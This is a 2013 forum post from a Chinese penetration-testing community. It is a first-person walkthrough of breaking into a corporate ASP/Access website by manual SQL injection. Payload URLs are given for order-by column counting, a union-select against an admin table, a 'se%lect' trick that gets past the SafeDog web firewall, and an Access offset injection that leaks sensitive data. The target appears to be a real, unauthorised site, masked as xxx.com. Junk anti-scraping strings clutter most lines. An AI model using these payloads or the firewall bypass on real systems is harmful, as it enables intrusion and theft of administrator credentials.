中国网络渗透测试联盟

标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入 [打印本页]

作者: admin    时间: 2013-3-8 21:49
标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。  A, _+ L4 O( g9 Z3 H/ _7 H6 \

: h0 Z) O; a/ }* K! u' R( ?: U7 j9 m3 C+ F4 U/ H# M$ D, t5 o
顺手加个admin
% b4 q7 Y/ D0 m* x$ Z( k! |7 d: n. I5 P0 i# S/ t
0 T% L6 E- g: O9 O) y) \& y
默认后台。
& R' a, v9 j9 ?: k回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​4 M( b. V1 x3 L. M7 z( Q

& \/ v) Z) [9 ]5 x: `4 O: T" t( n* Y8 D# Q
. u6 ?5 h5 A7 N* x1 t
所以就不用御剑扫了,待会直接封IP。
7 Y# o; b) X7 F
8 P* X% C% E( z; S1 f用order by语句判断是否存在注入。/ s5 r- D) v) `! q: r1 T
http://www.xxx.com /product_show.asp?id=997 order by 1$ r  B/ ?$ V" s  |* {
http://www.xxx.com /product_show.asp?id=997 order by 100* _6 _# ?" C- e4 Z
现在存在注入,经测试后发现是9个字段。. C% l/ V% o1 V( ^
  @* C- C: t' M1 X7 ?0 b
接下来进行联合查询,猜是否存在admin表。
# i* W6 \& [, {$ v) shttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
0 E! T, n# }, M
3 m8 M/ C2 C- q. s/ G/ P0 `% _9 w3 Q1 ?/ ?

4 ]0 Z. x" Z6 w& p% q! \在select中间加个%,se%lect绕过安全狗。0 `8 @: y$ b4 m; ~3 g2 g( K  g) s

% z+ W0 x/ L3 n, v( \; R# @, ], t3 [% u7 H5 E6 ~
发现存在admin表,然后开始手工猜常用的字段。
' h5 u* |0 m4 `9 a2 r- ?纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。6 u5 t3 y* b: Q" J1 u; B  K

- B) D$ N8 T: l8 ?突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。5 K# F  q' q- r$ h% |- h( j

( H/ |, n7 r5 q* D科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
7 I( W( l) Y. o' phttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin9 b( E. D, X) ~8 a) ]
好了,敏感内容出显了。​
( [6 D  F  W4 k( @; P! \7 v- s
. y. z9 I5 ]" g4 C' m9 t8 Y; c" |+ q
0 @* B' g) G0 G2 k- g9 r+ e" v" v





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2